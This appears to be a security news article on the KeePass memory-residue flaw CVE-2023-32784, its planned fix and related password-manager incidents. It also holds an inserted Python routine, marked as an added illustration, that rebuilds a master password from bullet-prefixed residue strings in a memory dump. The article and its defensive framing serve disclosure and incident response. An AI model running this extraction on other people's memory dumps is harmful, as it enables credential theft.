CyberSecurity SEE

KeePass Vulnerability Puts Master Passwords at Risk


A security researcher has uncovered a significant vulnerability in the popular KeePass open-source password manager, according to reports. The flaw, which is present in versions of KeePass 2.X for Linux, macOS and Windows, allows attackers to retrieve a targeted victim’s master password from a memory dump, even when the user’s workspace is locked. KeePass’ maintainer has developed a fix for the vulnerability, which is to be included in version 2.54 of the software, due for release early next month.

The researcher who discovered the issue, tracked as CVE-2023-32784, has already released a proof-of-concept on GitHub. The researcher, using the name vdohney, said that an attacker could retrieve the master password even if the user had locked the workspace, and even after KeePass was no longer running. Vdohney added that while the flaw requires an attacker with read access to a host’s filesystem or RAM, that is often not a hurdle, as remote attackers can gain such access via vulnerability exploits or phishing, among other methods.

The vulnerability is related to how a custom KeePass text box for entering passwords, called “SecureTextBoxEx”, processes user input. As a user types a password, leftover strings remain in process memory, and from them an attacker can reconstruct the password in clear text. For example, typing the word “password” leaves behind the strings “•a”, “••s”, “•••s”, “••••w”, “•••••o”, “••••••r”, “•••••••d”.
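As an added illustration of the residue described above (this is not code from the page or from the published proof-of-concept), the following Python scans a constructed UTF-16 memory image for bullet-prefixed leftover strings and reports how much of the password they reveal, which is the check an incident responder would run on a dump of their own KeePass process to decide whether the master password must be rotated. The dump layout, the filler bytes and the sample password are constructed assumptions.

```python
import re
from collections import defaultdict

BULLET = "\u2022"                       # masking character shown by SecureTextBoxEx
BULLET_LE = BULLET.encode("utf-16-le")  # b'\x22\x20' as .NET stores it in memory


def build_sample_dump(secret: str) -> bytes:
    """Constructed stand-in for a process dump: one residual string per keystroke
    (bullets for the characters typed so far plus the newest character), mixed
    with unrelated filler. The first character never appears in a residue."""
    chunks = [b"\x00" * 8]
    for i in range(1, len(secret)):
        residual = BULLET * i + secret[i]
        chunks.append(residual.encode("utf-16-le"))
        chunks.append(b"\xff\x00junk\x00" * 2)  # arbitrary filler bytes
    return b"".join(chunks)


# One or more UTF-16LE bullets followed by the two bytes of the next character.
_RESIDUE = re.compile(rb"(?:\x22\x20)+(..)", re.DOTALL)


def recover_candidates(dump: bytes) -> dict:
    """Map 0-based password position -> set of characters seen at that position."""
    found = defaultdict(set)
    for m in _RESIDUE.finditer(dump):
        bullets = (m.end() - m.start() - 2) // 2   # residue length = position index
        ch = m.group(1).decode("utf-16-le", errors="replace")
        if ch.isprintable() and ch != "\ufffd":    # drop NUL/control/invalid pairs
            found[bullets].add(ch)
    return dict(found)


def reconstruct(dump: bytes) -> str:
    """Render what the residues reveal: '?' for unknown, [ab] where dumps disagree."""
    found = recover_candidates(dump)
    if not found:
        return ""
    out = ["?"]  # position 0 is never recoverable from these residues
    for pos in range(1, max(found) + 1):
        chars = found.get(pos, set())
        if len(chars) == 1:
            out.append(next(iter(chars)))
        elif chars:
            out.append("[" + "".join(sorted(chars)) + "]")
        else:
            out.append("?")
    return "".join(out)


if __name__ == "__main__":
    print(reconstruct(build_sample_dump("password")))  # ?assword
```

An empty result means no residue was present; anything else means the dump exposes most of the master password and it should be treated as compromised.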

KeePass’ maintainer, Dominik Reichl, acknowledged the issue in a SourceForge discussion thread and said two enhancements to the password manager addressing the problem would be included in the next KeePass release (2.54), along with other security-related features. Reichl initially indicated that would happen sometime in the next two months but later revised the estimated delivery date for the new version to early June. Reichl added that “a realistic estimate for the KeePass 2.54 release probably is ‘in the beginning of June’ (i.e. 2-3 weeks), but I cannot guarantee that.”

This is the second recent security issue uncovered with KeePass, with researcher Alex Hernandez in February demonstrating how an attacker with write access to KeePass’ XML configuration file could edit it in a way that retrieved clear-text passwords from the password database and silently exported them to an attacker-controlled server. That vulnerability received a formal identifier, CVE-2023-24055, although KeePass disputed the description.

The new vulnerability in KeePass is likely to spark further discussions around password manager security, which have increased in recent months. These incidents have highlighted security issues surrounding major password manager technologies. In December, LastPass disclosed an incident where a threat actor, using credentials from a previous intrusion at the company, accessed customer data stored with a third-party cloud service provider. Researchers at Google warned in January about password managers, such as Bitwarden, Dashlane and Safari Password Manager, auto-filling user credentials without prompting on untrusted pages. Meanwhile, threat actors have increased attacks on password manager products.
